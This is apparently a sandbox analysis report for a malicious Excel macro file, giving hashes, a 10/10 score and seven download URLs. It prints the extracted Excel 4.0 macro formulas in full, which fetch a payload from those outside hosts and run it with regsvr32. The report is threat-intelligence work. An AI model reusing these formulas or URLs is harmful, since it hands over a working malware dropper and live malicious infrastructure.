Overview

overview

10

Static

static

10

c5d2d725e5...3.xlsm

windows7-x64

10

c5d2d725e5...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c5d2d725e588ff4692bd3c1732268c8dfa66c964cfa1702a027a87d7d962e8b3

  • Size

    35KB

  • Sample

    241120-vm6jgazmbv

  • MD5

    26ab39b60074ee513962ca7694d66a5e

  • SHA1

    3ea8eea01dbb3a4b662c310280b731712fa407a5

  • SHA256

    c5d2d725e588ff4692bd3c1732268c8dfa66c964cfa1702a027a87d7d962e8b3

  • SHA512

    9f9061acbe7025039751f43462574972f4ef4c6da6931eb924986dcd86f53052931c3df11d97d22a945801f9057e367d0beb6dcebd4df22a132c146ff5f0f6e8

  • SSDEEP

    768:q0t+5eEAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooaDx:q0t+gEUOZZ1ZYpoQ/pMA39

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.rivabodrumresort.com/eski_site/HozRXt/

https://www.iinil.com/phpmyadmin/oWnF6m7JoN/

https://britainsolicitors.com/wp-admin/OshgKKcJ3I/

https://test.ezzclinics.com/elxaji0/BnqhzGnKzDEi01/

https://britspizzeria.com/cgi-bin/WRo/

https://trainingeighteen.co.zw/wp-content/f1Q3/

https://thiendoan.com/venmo/Mp1r/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rivabodrumresort.com/eski_site/HozRXt/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.iinil.com/phpmyadmin/oWnF6m7JoN/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britainsolicitors.com/wp-admin/OshgKKcJ3I/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://test.ezzclinics.com/elxaji0/BnqhzGnKzDEi01/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britspizzeria.com/cgi-bin/WRo/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://trainingeighteen.co.zw/wp-content/f1Q3/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://thiendoan.com/venmo/Mp1r/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.rivabodrumresort.com/eski_site/HozRXt/
xlm40.dropper

https://www.iinil.com/phpmyadmin/oWnF6m7JoN/
xlm40.dropper

https://britainsolicitors.com/wp-admin/OshgKKcJ3I/
xlm40.dropper

https://test.ezzclinics.com/elxaji0/BnqhzGnKzDEi01/
xlm40.dropper

https://britspizzeria.com/cgi-bin/WRo/
xlm40.dropper

https://trainingeighteen.co.zw/wp-content/f1Q3/
xlm40.dropper

https://thiendoan.com/venmo/Mp1r/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.rivabodrumresort.com/eski_site/HozRXt/
xlm40.dropper

https://www.iinil.com/phpmyadmin/oWnF6m7JoN/
xlm40.dropper

https://britainsolicitors.com/wp-admin/OshgKKcJ3I/

Targets

    • Target

      c5d2d725e588ff4692bd3c1732268c8dfa66c964cfa1702a027a87d7d962e8b3

    • Size

      35KB

    • MD5

      26ab39b60074ee513962ca7694d66a5e

    • SHA1

      3ea8eea01dbb3a4b662c310280b731712fa407a5

    • SHA256

      c5d2d725e588ff4692bd3c1732268c8dfa66c964cfa1702a027a87d7d962e8b3

    • SHA512

      9f9061acbe7025039751f43462574972f4ef4c6da6931eb924986dcd86f53052931c3df11d97d22a945801f9057e367d0beb6dcebd4df22a132c146ff5f0f6e8

    • SSDEEP

      768:q0t+5eEAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooaDx:q0t+gEUOZZ1ZYpoQ/pMA39

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks